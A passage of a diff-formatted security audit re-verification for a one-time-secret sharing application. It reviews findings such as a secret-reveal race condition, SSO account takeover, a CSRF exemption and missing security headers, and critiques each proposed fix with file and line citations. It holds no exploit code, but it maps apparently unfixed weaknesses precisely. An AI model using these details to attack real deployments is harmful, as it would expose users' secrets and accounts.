+| A6 | Medium | upheld | correct | minor_drift | partial | False | sound_with_caveats | none |
+| A7 | Medium | upheld | correct | minor_drift | confirmed | False | sound_with_caveats | none |
+| A8 | Medium | upheld | correct | minor_drift | confirmed | False | sound | none |
+| D2 | Medium | upheld | correct | all_accurate | confirmed | True | sound | none |
+| D3 | Medium | upheld | correct | all_accurate | confirmed | True | sound | none |
+| D4 | Medium | upheld | partial (full-stack only) | all_accurate | confirmed | False | sound | none |
+| D5 | Medium | upheld | correct | all_accurate | confirmed | True | sound | none |
+| S3 | Medium | upheld | **incorrect (doc says No; Yes)** | all_accurate | confirmed | **True** | sound_with_caveats | none |
+| C4 | Medium | upheld | partial (C4a yes / C4b no) | all_accurate | confirmed | True | sound | none |
+| C5 | Low | upheld | correct | minor_drift | confirmed | True | sound | none |
+| C6 | Low | upheld | correct | minor_drift | confirmed | True | sound | none |
+| AZ6 | Low | upheld | correct | all_accurate | confirmed | True | sound | none |
+| AZ7 | Low | upheld | partial | all_accurate | confirmed | True | sound_with_caveats | none |
+| AZ8 | Low | upheld | partial | all_accurate | partial | False | **incomplete (regresses ≥5 callers)** | none |
+| AZ9 | Low | upheld | correct | all_accurate | confirmed | False | sound | none |
+| P4 | Low | upheld | correct | minor_drift | confirmed | False | **unsound** | none |
+| P5 | Low | upheld | correct | all_accurate | confirmed | False | sound | none |
+| S4 | Low | upheld | partial | all_accurate | confirmed | False | sound | none |
+| S5 | Low | upheld | correct | all_accurate | partial | False | sound | none |
+| OBS1 | Info | upheld | correct | all_accurate | confirmed | False | sound | none |
+
+---
+
+## 3. C1 — runtime re-verification (headline)
+
+Re-ran the committed model PoC (adapted only for this worktree's `RACK_ENV=test` config resolution; logic
+unchanged) and added a true multi-process reproduction, both against **familia 2.11.0**. Evidence:
+`evidence/race_poc_reverify_2026-06-24.md`.
+
+- **Model barrier PoC (deterministic):** 10 threads, **10/10** passed the `viewable?` gate and returned
+  the plaintext; secret consumed. Matches the assessment's "deterministic 10/10."
+- **True multi-process PoC (12 independent OS processes, no shared GIL, shared consume barrier):**
+  **12/12 processes obtained the same secret's plaintext**; the Redis key was deleted (`EXISTS`→0).
+  This independently reproduces the assessment's headline "12/12."
+- **In-process full-stack PoC via the real `/api/v2/secret/:id/reveal` endpoint:** **1/25** — GIL-bound, as
+  the assessment itself predicted. Confirms *why* a single MRI process masks the bug, not a refutation.
+
+**Prescribed fix is sound and genuinely atomic.** Option A's `consume!` runs `HGET state → (if new/previewed)
+HGETALL + DEL → return` inside a single Redis `EVAL`; Redis executes Lua atomically, so exactly one caller
+can observe a consumable state and delete — the rest get `nil`. This is a single-winner op, not check-then-act.
+
+> **Re: the "12/12 → 1/12" fix evidence (now committed at `evidence/c1_fix_verification.md`).** It was
+> run on a separate fix worktree against `claim_consumption!` (the prescribed atomic consume). After the
+> fix: `viewable=12/12` (all pass the non-authoritative pre-check) but **`won=1/12` and `got plaintext=1/12`**
+> — *exactly one* caller wins and discloses. **That is the one-time guarantee holding, not a residual leak:**
+> `1/12` = one legitimate reader; `0/12` would mean the secret is unreadable by anyone. So the prior
+> handoff's reading of "1/12, not 0/12 → residual disclosure" was mistaken — `1/12` is the *success*
+> criterion. Before the fix: 12/12 all leak; after: 1/12 single winner. The prescription closes the race;
+> extending the same atomic consume to **burn** and the v1/v3 paths is correct.
+
+**Cross-confirmation.** The original assessment's `evidence/race_poc_output.md` (familia 2.10.1) shows the
+identical pattern to this pass's reproduction (familia 2.11.0): deterministic **10/10**, GIL-masked natural
+race **1/N**, true multi-process **12/12**. Two independent runs on two familia versions agree — the headline
+is not an artifact of one environment.
+
+---
+
+## 4. Corrections to apply (the actionable deltas)
+
+### 4a. Severity / applicability over-statements (2)
+- **P1 (CSRF for cookie-auth `/api/*`): recommend *reconsidering* High → Medium** (a judgment call, not a
+  settled downgrade). **Confirmed by hand:** the session cookie defaults to **`SameSite=Lax`** in production
+  (`lib/onetime/boot.rb` `SESSION_DEFAULTS`; `etc/defaults/config.defaults.yaml:293`), which blocks the
+  described cross-site `POST`, and the path is unreachable in the default config (auth off → `sessionauth`
+  never registered). **But** the residual same-site sibling-subdomain forgery vector and browser variance
+  are why many reviewers keep an explicit CSRF exemption elevated regardless of SameSite — so treat this as
+  "reconsider," not "downgrade." The finding itself (blanket `/api/` token-CSRF exemption) stands.
+- **P2 (host-header forwarded-trust): keep Medium, drop the default-config claim.** An external attacker
+  in the default config has a **public `REMOTE_ADDR`**, so `private_ip?` is false and forwarded Host is
+  ignored (finding 04 itself concedes this). P2 needs a private/loopback/SSRF vantage — *not* out-of-the-box.
+  **A3 is unaffected** and correctly High: auth-email links read raw `HTTP_HOST` directly.
+
+### 4b. Prescribed fixes that misfire as written (5 — fix the resolution docs before implementing)
+- **P4 — fix is UNSOUND.** `Customer.dummy` (`customer.rb:331-340`) never sets an apitoken, so
+  `apitoken?` early-returns at `:263` *before* `secure_compare` runs — no timing parity is achieved.
+  Compounding: the doc's "expensive BCrypt / ~280ms" premise is wrong; V1 uses cheap
+  `Rack::Utils.secure_compare`. A sound fix must give the dummy a real non-empty token.
+- **AZ8 — fix INCOMPLETE / regressing.** The prescribed `CREATE_FORBIDDEN_ATTRS` raise on
+  `role`/`verified`/`verified_by` would break **five production callsites** that pass those as literal
+  kwargs into `Customer.create!` — *enumerated by hand:* two in the auth flow
+  (`apps/web/auth/operations/create_customer.rb:62`, `sync_session.rb:175`) and three in CLI/dev tooling
+  (`lib/onetime/cli/customers/create_command.rb:97`, `cli/apitoken_command.rb:168`,
+  `application/auth_strategies/dev_basic_auth_strategy.rb:182`). (The doc's "callers unaffected" claim
+  checked only the create-flow path; the verify-stage agent undercounted to 2.) Migrate those callsites to
+  post-create assignment, or special-case the literals. The vuln itself stays latent — no params-forwarding sink.
+- **AZ3 — fix INCOMPLETE / regressing + one mispoint.** Allowlist omits `is_default`; the fail-closed raise
+  would break the two splat callers (`plans.rb`, `welcome.rb`) that pass `is_default: true`. Also the
+  "sole caller" claim is false (3+ callers) and `planid` is mis-cited to `organization.rb:87` (an init
+  default; real declaration in `with_organization_billing.rb:34`). Vuln still latent (no params-forwarding sink).
+- **AZ2 — finding confirmed; the fix's sink needs a second look (relayed, not hand-confirmed).** Direct
+  read confirms `safe_dump` exposes `objid`, `owner_id`, `created_by`, `contact_email`, `billing_email` to
+  any member (`organization/features/safe_dump_fields.rb:17-29`) — the leak is real and the finding stands.
+  The sub-agent further claimed the member-facing leak actually rides on `created_by` via the API serializer
+  (with `owner_id` stripped downstream), so the prescribed `safe_dump` minimization may target the wrong
+  layer and could regress `id`/`owner_extid`/`role`. **I could not locate a `serialize_organization`
+  stripper to confirm that refinement** — verify the actual member-facing serializer before editing `safe_dump`.
+- **A1 — fix has a real residual gap (does not undermine the finding).** Layers 1–2 of the proposed
+  `#3499`-folded fix do **not** close cross-provider takeover of a *pure-SSO* victim account by a malicious
+  tenant IdP (the helper `account_has_other_authenticators?` returns false for such accounts). Also: the
+  github `email_claim_verified?` is assumed `true` unconditionally, and the whole fix depends on `#3499`'s
+  not-yet-landed `resolve_omniauth_email`. Design needs the pure-SSO case handled before SSO ships.
+
+### 4c. Internal "affects default config?" contradictions (resolution-doc header vs. risk register)
+Where they disagree, the register is generally the more defensible reading:
+- **AZ1, AZ4:** resolution header says **Yes**, register says **No** — register correct (auth-OFF default
+  makes these org endpoints unreachable). Fix the doc headers.
+- **S3:** resolution header says **No**, register says **Yes** — **register correct** (any anonymous
+  recipient reveal populates the SPA store; no flag needed). The vuln *is* default-reachable.
+- **A3/P2, D4, C4, AZ7, AZ8, S4:** "partial" — the doc over- or under-generalizes a split (e.g., C4a is
+  default-reachable but C4b needs a misconfigured `RACK_ENV=test`; D4 ships only in the full compose stack).
+
+### 4d. Lower-priority fix caveats (sound, but note)
+- **S4:** `DOMPurify.addHook` is global to the singleton — it cannot be "scoped to this component's
+  sanitize call" as the doc suggests.
+- **AZ7:** the inviter-attribution snippet reads a `Customer#display_name` that doesn't exist (doc hedges
+  to "omit" — take that path).
+- **A6:** pinning the WebAuthn RP-ID invalidates already-enrolled credentials (doc flags it; sequence
+  after A3/P2).
+
+---
+
+## 5. Cross-cutting meta-findings (about the assessment itself)
+
+1. **"Fork" framing is inaccurate (cosmetic).** The executive report's header calls `rodauth` and
+   `rodauth-omniauth` "OTS forks," but this bundle resolves both to **upstream rubygems** (rodauth 2.42.0;
+   rodauth-omniauth 0.6.2 = `janko/rodauth-omniauth`). 20 findings cite "fork" library files that are plain
+   upstream. It does **not** undermine any finding — every auth/SSO vuln is correctly attributed to OTS's
+   own config overrides — and the report's own §4 already says "rodauth-omniauth is unmodified upstream
+   v0.6.2." Recommend correcting the header wording to "OTS auth *configuration* over upstream rodauth."
+2. **The `evidence/` directory was missing because `.gitignore:5` ignores `*.txt` — now RESOLVED.** C1/S1/S2
+   originally cited `evidence/*.txt`, which git silently excluded (a process trap, not an oversight: any
+   future `evidence/*.txt` vanishes the same way). The original author has since committed the evidence as
+   tracked **`.md`** (`310fe1a5e7`): `race_poc_output.md`, `c1_fix_verification.md`, `headers_output.md`, and
+   fixed the references across the docs. **`headers_output.md` is the live S1/S2 proof** — `GET /api/v2/status`
+   returns with `content-security-policy`, `x-frame-options`, and `strict-transport-security` all `<ABSENT>`.
+   This pass's `evidence/race_poc_reverify_2026-06-24.md` is retained as the independent familia-2.11.0
+   cross-check. Recommendation going forward: keep PoC evidence as `.md` (or `git add -f`).
+3. **Citation drift is real but minor.** Abbreviated library paths (`features/lockout.rb:15`), directory
+   slips (`logic/members/` vs `logic/invitations/`, `middleware_stack.rb` vs `application/middleware_stack.rb`),
+   and ±2–9 line offsets are common but always resolve to the right construct. The only true mispoint is
+   AZ3's `planid` citation.
+
+---
+
+## 6. Note on the dependency bump
+
+To verify against the versions requested (familia 2.11.0, otto 2.3.1, rhales 0.7.1), `Gemfile` constraints
+were updated (`familia ~> 2.11`, `rhales ~> 0.7.1`; otto already satisfied `~> 2.3`) and `bundle install`
+re-locked offline. **familia 2.11.0 introduced no drift in the C1-relevant internals** (`persistence.rb`
+`destroy!` and `database_commands.rb` `delete!` resolve exactly; the race reproduces). This is a working-tree
+change on an otherwise docs-only branch — left uncommitted pending the maintainer's decision on whether to
+land it separately from the security docs.
+
+---
+
+## 7. Per-finding detail
+
+### A1 — confirmed, fix sound_with_caveats
+A1 is a real, correctly-cited account-takeover vulnerability (SSO-gated, not default-config); the core OTS-config citations resolve exactly, severity Critical-when-SSO-on is upheld, and the proposed #3499-folded fix is sound with two caveats (github verified-assumption, dependency on unlanded resolve_omniauth_email); only meta-issues are the cosmetic 'fork' mislabel and a minor gem-path drift, neither undermining the finding.
+
+Discrepancies:
+- Path drift: finding cites rodauth-omniauth lib/rodauth/omniauth_base.rb but actual file is lib/rodauth/features/omniauth_base.rb (omniauth_email defined at 67-71 as omniauth_info['email']). Missing 'features/', no line number — minor drift, not a mispoint.
+- Precision nuance (finding gets it right): for an already-OPEN victim account the takeover succeeds via account_from_omniauth→create_omniauth_identity→login regardless of the verify override; omniauth_verify_account? true only EXTENDS takeover to unverified/unopen accounts (the upstream guard is consulted only in the if account && !open_account? branch, gem line 69-70). This strengthens vuln_real.
+
+### C1 — confirmed, fix sound
+C1 is a real, correctly-cited TOCTOU race exploitable in the default anonymous-sharing config, and the prescribed Option A consume! is a genuinely atomic single-EVAL single-winner fix (Options B/C also sound); severity High upheld.
+
+Discrepancies:
+- Burn citation 'viewable? check at :55' is slightly loose — :55 computes `viewable = potential_secret.viewable?`; the construct is present, minor drift not an error.
+- Resolution doc references 'v1/v3 reveal paths' but the codebase/finding-side docs only enumerate v1 and v2; the 'v3' label is loose but immaterial — both real paths (v1 show_secret.rb:71, v2 reveal_secret.rb:189) call secret.revealed!.
+
+### A2 — confirmed, fix sound
+A2 is accurately cited (all line ranges exact), the vuln/behavior is real and intentional (#3114, spec-asserted), the Low-Med reclassification is justified (SSO-as-authenticated is industry default, not default-reachable since SSO is off out-of-box), and the prescribed fix is sound and genuinely additive (opt-in toggle, default unchanged).
+
+Discrepancies:
+- Exec report line 112 says 'SSO bypasses MFA unconditionally' while resolution title softens to 'opt-in second factor'; both are consistent with code (bypass overrides even :required policy) — no contradiction, just framing shift after reclassification.
+
+### A3/P2 — confirmed, fix sound_with_caveats
+A3 and P2 are real and all finding/fix citations resolve and support their claims; severity for A3 holds, but P2 is overstated as default-config-reachable (external attacker has public REMOTE_ADDR so forwarded Host is ignored), the 'fork' framing is wrong (upstream rodauth), and fix step #2 does not actually close A3 — only step #1 (repin base_url) does.
+
+Discrepancies:
+- P2 default-config applicability overstated: resolution doc says 'P2 is latent in all configs' and register treats it as default-reachable, but an external attacker in default config has a PUBLIC REMOTE_ADDR -> private_ip? false -> only Host header consulted, forwarded headers ignored. Finding 04 line 175 itself concedes the public-client case is safe. P2 requires a private/loopback/SSRF vantage, so it is NOT exploitable in the out-of-the-box single-external-attacker config.
+- A3/P2 conflated as 'same underlying weakness' but they have distinct sinks: A3 email links read raw HTTP_HOST (bypasses DetectHost); P2 is the DetectHost->DomainStrategy routing/reflection path. The shared-remediation framing obscures that #2 does not fix A3.
+
+### A4 — confirmed, fix sound_with_caveats
+A4 is a confirmed real vulnerability with all citations resolving accurately and severity (High, SSO-gated, not default-reachable) correctly calibrated; the prescribed fix is sound but contingent on the unimplemented #3499 helper and omits the repeat-login identity path, and the 'fork' label on the upstream rubygems gem is a cosmetic meta-error.
+
+Discrepancies:
+- Fix depends on unimplemented #3499 helper (resolve_omniauth_email); not yet present in app source, so the resolution is a plan, not verifiable as code.
+- Fix omits the account_from_omniauth_identity linking path (gem omniauth.rb:62), which would also bypass a check placed only in account_from_omniauth.
+
+### P1 — partial, fix sound_with_caveats
+Citations all resolve and the path-keyed exemption is structurally real, but the assessment overstates it as High by silently ignoring the default SameSite=Lax cookie that blocks the described cross-site POST attack — realistic severity is Medium, default-config unreachable (auth off), and the prescribed fix is sound in intent but reads a never-populated env key, so it must key on credential presence instead.
+
+Discrepancies:
+- Material omission inflating severity: neither finding (04/06) nor resolution mentions the session cookie already defaults to SameSite=Lax (boot.rb:83, applied middleware_stack.rb:318). Lax blocks the exact described attack (cross-site form/fetch POST does not carry a Lax cookie), reducing realistic exploitability from High to Medium.
+- default_config 'No' is correct but for a reason the docs don't state: when auth is OFF (default), account_creation_allowed? early-returns and 'sessionauth' is never registered (auth_strategies.rb:30-34), so the vuln is unreachable out-of-the-box independent of SameSite.
+- Fix sketch reads env['otts.auth_method'] that is never populated and would not exist at middleware time given post-routing auth wrapping — internal mechanism/ordering error in the resolution.
+
+### S1 — confirmed, fix sound
+S1 is confirmed: CSP defaults off (config.defaults.yaml:353) and helpers.rb:171 is the sole emitter gated on enabled==true, so a default install (auth off) ships no CSP; citations resolve with only minor line drift, and the fix is sound - the one flaw is the cited live-confirmed evidence file is absent from the repo.
+
+Discrepancies:
+- The 'live-confirmed' evidence artifact evidence/headers_output.txt is referenced by the resolution doc, finding 05, exec report (line 136), and risk register (line 16), but no evidence/ directory exists in the assessment folder - the live-confirmation claim is unsupported by any committed file. Code analysis independently confirms the behavior, so the finding still holds.
+- Citation range helpers.rb:171-208 ends 4 lines before the actual header-emit at line 212; the gate (171) and policy directives are squarely in-range - minor drift, not a mispoint.
+
+### S2 — confirmed, fix sound_with_caveats
+S2 is a confirmed, accurately-cited High default-config weakness (no X-Frame-Options, no frame-ancestors, no HSTS out of the box); the only blemishes are a non-existent evidence file cited as live proof and a fix that understates the HSTS/COOP implementation work beyond config flips.
+
+Discrepancies:
+- The 'Confirmed live' empirical claim (X-Frame-Options/HSTS absent on /api/v2/status) cites ../evidence/headers_output.txt, which does not exist; no evidence/ directory is present in the assessment tree (only poc/headers_check.rb). Cited identically in resolution doc, finding 05, and risk-register row S2 — a non-resolving citation for the load-bearing empirical proof.
+- head-base.rue:8-9 is off by one line (referrer meta at line 7) — minor drift, right construct present.
+- Fix understates HSTS work: a strict_transport default flip alone emits HSTS on plain HTTP since Rack::Protection::StrictTransport adds the header unconditionally; the promised HTTPS guard is unbuilt.
+
+### D1 — confirmed, fix sound
+D1 is a confirmed real vulnerability with accurate finding-side citations and a sound, complete fix (bump to >= 2.0.22, permitted by the existing constraint); only cosmetic defects remain — the resolution doc names the wrong transitive chain and mis-describes the lockfile range format.
+
+Discrepancies:
+- Resolution doc (D1-oauth2-cve.md:7-8,27,41) states the transitive chain is omniauth_openid_connect → openid_connect → rack-oauth2; that is the wrong consumer (rack-oauth2 is an independent gem). The actual oauth2 consumers are omniauth-oauth2 (1.9.0) and omniauth-google-oauth2 (1.2.2) per Gemfile.lock:290,294 — which the FINDING file (06 §1.1) cites correctly. Finding/fix docs disagree on the chain; finding is right.
+- Resolution verification step (D1-oauth2-cve.md:27,41) instructs confirming `Gemfile.lock shows oauth2 (>= 2.0.22)`, but Gemfile.lock records a single resolved version (e.g. 2.0.24), never a range. Cosmetic, not load-bearing.
+
+### C2 — confirmed, fix sound
+C2 is accurate and confirmed: every default OTS deployment shares Familia's hardcoded 'FamilialMatters' HKDF salt/BLAKE2b personalization with no app override; all citations resolve in familia-2.11.0 and support the claims; Medium severity is correctly calibrated as bounded defense-in-depth weakening, and the prescribed fix is sound (and safer than the doc assumes, since rbnacl is absent so the history-safe AES-GCM path is the live writer).
+
+Discrepancies:
+- Finding-side citations (file 03) use authoring-environment absolute paths /home/user/onetimesecret/... and /home/user/familia/...; all resolve correctly to the worktree and familia-2.11.0 gem — cosmetic, not mispoints.
+- base_secret_action.rb:127 (resolution doc) resolves to apps/api/v2/logic/secrets/base_secret_action.rb:127 (@ttl = 30.days max TTL bound) — abbreviated path, correct construct; the '7 day default' part of the prose isn't at that line but the 30-day cap is.
+
+### C3 — confirmed, fix sound_with_caveats
+C3 is a real, reachable-by-default Medium: V1 ShowSecret lacks the per-secret passphrase lockout that V2 has, a wrong guess leaves the secret viewable (state→previewed), and V1 routes are mounted unconditionally — citations all resolve with only minor line drift, and the prescribed shared-bucket fix is sound apart from an honestly-flagged V1 LimitExceeded-rendering caveat.
+
+Discrepancies:
+- Snippet line labels in resolution doc (raise_concerns@29, process@33) and risk register (show_secret.rb:26-31) are off by ~2 lines from actual (raise_concerns@26, process@30); right constructs present — minor drift, not a mispoint.
+- Default-config applicability independently confirmed: V1::Application sets @uri_prefix='/api/v1' (application.rb:63) and auto-registers via base.rb inherited hook (212-216) with no enable flag; routes.txt exposes POST /secret/:key as anonymous. So V1 is routable out-of-the-box.
+
+### P3 — confirmed, fix sound
+Accurate, well-cited Medium: V1 limiter is genuinely fail-open and auth-exempt and V2/V3 secret creation plus login have no app-layer throttle in the default (auth-off) config; every finding- and fix-side citation resolves to the right construct and the prescribed reuse-the-feedback-limiter fix is sound and feasible.
+
+Discrepancies:
+- Fix doc cites otto gem files via the assessment author's absolute path /home/user/otto/lib/... rather than the standardized otto-2.3.1 gem path; constructs resolve correctly (utils.rb:112-140, request.rb:122-132) so this is a path-format artifact, not a mispoint.
+- P3 does not invoke the disputed rodauth/rodauth-omniauth 'fork' framing — its lockout.rb citation is the OTS app config (apps/web/auth/config/features/lockout.rb, max_invalid_logins 5 at line 15), not a gem file, so the fork meta-check does not apply here.
+
+### AZ1 — confirmed, fix sound
+AZ1 is accurate and well-cited: RemoveMember genuinely is the lone member-mgmt endpoint bypassing the fail-closed entitlement gate, the fix is sound, severity Medium holds; the only defect is an internal contradiction where the resolution doc marks default-config 'Yes' while the register correctly marks it 'No (orgs)' — not reachable in the auth-OFF default deploy.
+
+Discrepancies:
+- Internal contradiction on default-config: resolution doc line 5 says 'Affects default config? Yes', but risk-register.md:23 and finding header say 'No (orgs)'. Register is correct — with auth OFF (default deploy) this authenticated multi-member-org endpoint is unreachable; resolution doc conflates 'feature exists' with 'reachable out-of-box'.
+- Sibling invitation endpoints cited under 'logic/members/' actually reside in apps/api/organizations/logic/invitations/. Line numbers and method calls accurate; only directory label drifts.
+- Finding correctly self-labels as 'not directly exploitable today' (plain member hits else-deny at remove_member.rb:174-179); defense-in-depth/consistency finding, appropriately Medium, not active priv-esc.
+
+### AZ2 — confirmed, fix sound_with_caveats
+AZ2 is a confirmed Medium: get_organization leaks objid/identifier, created_by (owner custid), and contact/billing PII to any member, but the finding mis-attributes the owner-custid leak to owner_id (already stripped by serialize_organization) when it actually rides on created_by, and the prescribed fix targets the wrong sink (safe_dump instead of serialize_organization), introducing id/owner_extid/role regressions.
+
+Discrepancies:
+- Finding analyzes the raw safe_dump field list and does not account for serialize_organization (apps/api/organizations/logic/base.rb:61) which is the actual sink for get_organization. The serializer already strips owner_id (base.rb:74) and converts to owner_extid (base.rb:72), so the owner_id-specific leak claim (title/exec line 163/resolution lines 23,32) overstates the actual API exposure.
+- BUT the practical 'owner custid leaks to any member' claim still holds via the co-cited created_by (safe_dump:27): created_by = creator's custid (organization.rb:68) and the standardize_owner_id chore keeps created_by == owner_id (organization.rb:434, chore lines 10-11). created_by is NOT stripped by the serializer. So owner custid does leak — via created_by, not owner_id.
+- objid still leaks through get_organization despite the serializer: base.rb:66 explicitly aliases record[:id] = record[:objid], and safe_dump includes objid — confirming the AZ5-linkage concern.
+
+### AZ3 — partial, fix sound_with_caveats
+The mass-assignment mechanism is genuinely present and the familia citations are exact, but it is latent (no caller forwards user-controlled params, so not reachable in default config); the 'sole caller' claim and the planid:87 citation are inaccurate, and the prescribed allowlist would regress two callers that pass `is_default: true` through the splat.
+
+Discrepancies:
+- 'Sole current caller' framing is false: there are 3+ production callers of Organization.create! (create_organization.rb:99, plans.rb:335, welcome.rb:383, create_default_workspace.rb:80) plus CLI/try fixtures. The NEEDS-VALIDATION question still resolves negative — every caller passes only literals/fixed args, none forwards a raw params hash — so the 'latent, not live' conclusion holds, but the supporting claim is inaccurate.
+- planid cited as plain field at organization.rb:87 is a mispoint: 87 is init's `@planid ||=` default; the field declaration is in with_organization_billing.rb:34. planid is a billing-concern field, not a core :65-72 plain field.
+- Fix doc internally contradicts reality: step 2 asserts the caller 'lands on the empty/allowlisted path unchanged,' but two callers pass is_default: true through the splat — the proposed allowlist would raise on them (regression).
+
+### AZ4 — partial, fix sound_with_caveats
+All AZ4 citations resolve and support the claims exactly; the model-layer weakness is real but latent (no reachable path lets a non-owner set owner today, so default-config exploitability is No — contradicting the resolution doc's 'Yes' header), and the step-1 allowlist fix is sound while transfer_ownership! remains an explicitly-deferred sketch.
+
+Discrepancies:
+- Internal contradiction on default-config: resolution doc header says 'Affects default config? Yes' (line 5) but the risk register row says 'No (orgs)'. Register is the more defensible reading for reachability (out-of-box, no second caller passes 'owner'); the resolution header overstates.
+- Resolution understates the existing defense: the live endpoint blocks owner THREE ways (VALID_ROLES allowlist :131, target owner? guard :141, new_role=='owner' :160), not just the single :159-167 check the doc emphasizes — strengthens 'not currently reachable'.
+- grep confirms doc claims (line 43, 139): zero transfer_ownership references; only change_role! caller outside specs is update_member_role.rb:67, gated by validate_role_change! at :58. NEEDS-VALIDATION resolves to: no reachable path lets a non-owner set owner today — latent/defense-in-depth, not a live vuln.
+
+### AZ5 — confirmed, fix sound
+AZ5 is a real but low-practical-impact defense-in-depth weakness; all finding- and fix-side citations resolve and support their claims (no version drift in familia 2.11.0), default-config is correctly marked not-reachable, and the prescribed keyed-HMAC fix is sound with the persisted-extid migration path empirically confirmed in the gem.
+
+Discrepancies:
+- Internal inconsistency on default-config: resolution doc line 5 says 'Affects default config? Yes' while register line 27 + exec say 'No (orgs)'. They answer different questions (weak derivation present everywhere vs. not exploitable out-of-box). For reachable_default_config the register's 'No' is correct: default deploy is auth OFF / no orgs, and exploitation additionally requires an objid leak (AZ2) plus cross-org objid knowledge.
+- Severity Medium is generously calibrated for a defense-in-depth gap: it is NEEDS-VALIDATION with no confirmed production sink and is non-exploitable until AZ2 leaks an objid AND an attacker obtains a *target* org's objid out-of-band. Defensible as Medium given the AZ2 compounding, but borderline Low; not a clear miscalibration.
+
+### A5 — confirmed, fix sound
+A5 is a real, correctly-scoped Medium: recovery codes stored verbatim in upstream rodauth-2.42.0 with no built-in hashing toggle and OTS overrides only the generator; finding citations accurate (minor line drift), the in-doc 'no toggle' correction is verified true, and the HMAC-override fix is sound; only meta-issue is the inaccurate 'fork' labeling of upstream gem files.
+
+Discrepancies:
+- base.rb line citations stale: compute_hmac cited :279 (actual 251), timing_safe_eql? cited :726 (actual 695) in 2.42.0; line drift, constructs present and support the fix.
+- OTS-override-absence confirmed both sides: mfa.rb overrides ONLY new_recovery_code (L74-76); no storage/compare override in apps/web/auth or config. A5's 'OTS didn't override storage' claim holds.
+
+### A6 — partial, fix sound_with_caveats
+A6 is real in mechanism and accurately cited (Medium, not default-reachable, correctly NEEDS-VALIDATION on the A3/P2 host-trust precondition); fix is sound with the honest RP-ID-invalidation caveat, but the 'fork rodauth' label is wrong (upstream gem) and the upstream default is itself request-derived, tempering the framing.
+
+Discrepancies:
+- Nuance the finding omits: upstream rodauth default webauthn_origin = base_url (webauthn.rb:336-338), and base_url itself defaults to request.base_url unless pinned. So OTS's request.host override is request-derived in the same spirit as the upstream default — the weakness is 'no pinned base_url/origin', not a uniquely-OTS regression. Doesn't change the fix but tempers the framing.
+- 'WebAuthn conditionally enabled (webauthn.rb:9-11)' is imprecise: line 9 enables :webauthn/:webauthn_login unconditionally within the block; the actual gate is config.rb:122 (if webauthn_enabled?). Conditional gating is real, citation just points at the wrong line.
+
+### A7 — confirmed, fix sound_with_caveats
+A7 is confirmed and correctly scoped: reset enumeration (distinct 401/403/200) and no max password length are both real upstream-default gaps OTS left unhardened; severity Medium and default-config=No are correct; fix is sound (A7b one-line, A7a mirrors email_auth) with the timing-oracle caveat the doc itself flags — only blemishes are wrong base.rb line numbers and the inaccurate 'fork' label on plain-upstream rodauth.
+
+Discrepancies:
+- base.rb line citations in resolution doc are mispointed: 401-status cited at :59 (actual :46), 403 at :80 (actual :67), only_json? at :46 (actual :437 — and :46 is the 401 line). Values correct, line numbers wrong; likely version-drift artifact, does not break the claim.
+- Finding-side doc (01-authn-session.md:159-160,173) cites the same constructs with correct ranges and is verified by grep ('overrides email_auth but NOT reset_password' confirmed: email_auth.rb:27 has the override, no reset override exists).
+
+### A8 — confirmed, fix sound
+A8 is a real, accurately-cited Medium: a 1-day per-account lockout (rodauth default, unoverridden by OTS) is a trivially weaponizable targeted DoS, not reachable in the default auth-off config; the fix correctly retargets the real interval knob, and the only blemishes are the upstream-mislabeled-as-fork framing and a ~9-line before_login_attempt drift.
+
+Discrepancies:
+- before_login_attempt cited as :263-268 but is at :254-258 in 2.42.0 (~9-line drift, likely version drift from the authored-against version); right construct, quoted block matches exactly — minor drift, not a mispoint.
+
+### D2 — confirmed, fix sound
+D2 is a confirmed real prod-tree JS CVE with all citations resolving exactly; severity (Medium-in-practice given the browser-only axios usage) and default-config "Yes" are both correctly calibrated, and the override fix is sound and complete across both transitive paths.
+
+Discrepancies:
+- Scanner rates this High (CVSS 8.7); the assessment downgrades to Medium-in-practice on the mitigation that axios's browser XHR/fetch adapter uses native FormData, not the Node form-data helper. This reasoning is technically sound and the latent-reactivation caveat (future SSR/Node multipart use) is acknowledged — not an overclaim.
+
+### D3 — confirmed, fix sound
+D3 is a real, default-reachable Medium info-disclosure: production source maps are emitted unconditionally and served at /dist by the default-on static middleware, fly statics, and Caddy proxy; every citation resolves and the 'hidden'+CI-strip fix is sound.
+
+### D4 — confirmed, fix sound
+D4 is fully confirmed and accurately cited — root-running, unpinned, recommends-laden internet-facing Caddy proxy in the full stack — with a sound fix; the only caveat is that it lives in the full compose topology, not the bare auth-OFF default.
+
+Discrepancies:
+- default-config nuance: D4 is reachable only in the FULL compose stack (docker-compose.full.yml builds+runs this image on 80/443; simple compose has no proxy). It is NOT exploitable in the stated out-of-the-box default (auth/SSO/diagnostics OFF) because that default topology is orthogonal — the simple stack ships no Caddy. The finding and register honestly scope it as '(Caddy variant)' rather than claiming the bare default; reachable_default_config=false against the task's literal default definition.
+- Finding file 06 cites apt as 'lines 90-96' and COPY as 'line ~112'; actual are 91-97 and 114 — 1-2 line drift, right construct. Resolution doc cites them exactly (91-97, 114). No mispoint.
+
+### D5 — confirmed, fix sound
+D5 is fully confirmed — every citation resolves and supports the claim, the unauthenticated/host-exposed datastore and guest:guest RabbitMQ are real and reachable in the default compose config, severity Medium is defensible, and the prescribed fail-closed fix is sound and complete.
+
+### S3 — confirmed, fix sound_with_caveats
+S3 is a real, accurately-cited Medium: revealed plaintext lingers in the Pinia store (plus a duplicate payload ref) with no teardown clear, and the prescribed onBeforeUnmount/route-guard fix is sound (honestly scoped as lifetime-minimization, not zeroization); the only defect is an internal contradiction on default-config applicability (resolution doc says No, register says Yes — Yes is correct).
+
+Discrepancies:
+- Internal contradiction on default-config applicability: resolution doc line 5 says 'Affects default config? No (behavioral; independent of any config flag)', but risk-register.md:36 marks Default?=Yes. The vuln IS reachable in default config (no auth/SSO/diagnostics needed — any recipient reveal populates the store), so the register's 'Yes' is correct and the resolution doc's 'No' is the error.
+- Minor path looseness: resolution line 20 prose says the only onUnmounted is in 'branded/BaseSecretDisplay.vue' and primary-files line 11 cites 'shared/components/base/BaseShowSecret.vue' correctly but 'branded/SecretDisplayCase.vue' abbreviated; the branded components actually live under apps/secret/components/branded/, not shared/components/branded/. Abbreviated forms resolve; no mispoint.
+
+### C4 — confirmed, fix sound
+C4 is confirmed with all citations resolving accurately; C4a (non-atomic check-then-record) is a real default-reachable bounded over-shoot and the reserve-before-verify+refund Lua fix is sound, while C4b (test Argon2 cost) is config-dependent not default — a nuance the resolution doc honors but the register's 'Default? Yes' one-liner over-generalizes.
+
+Discrepancies:
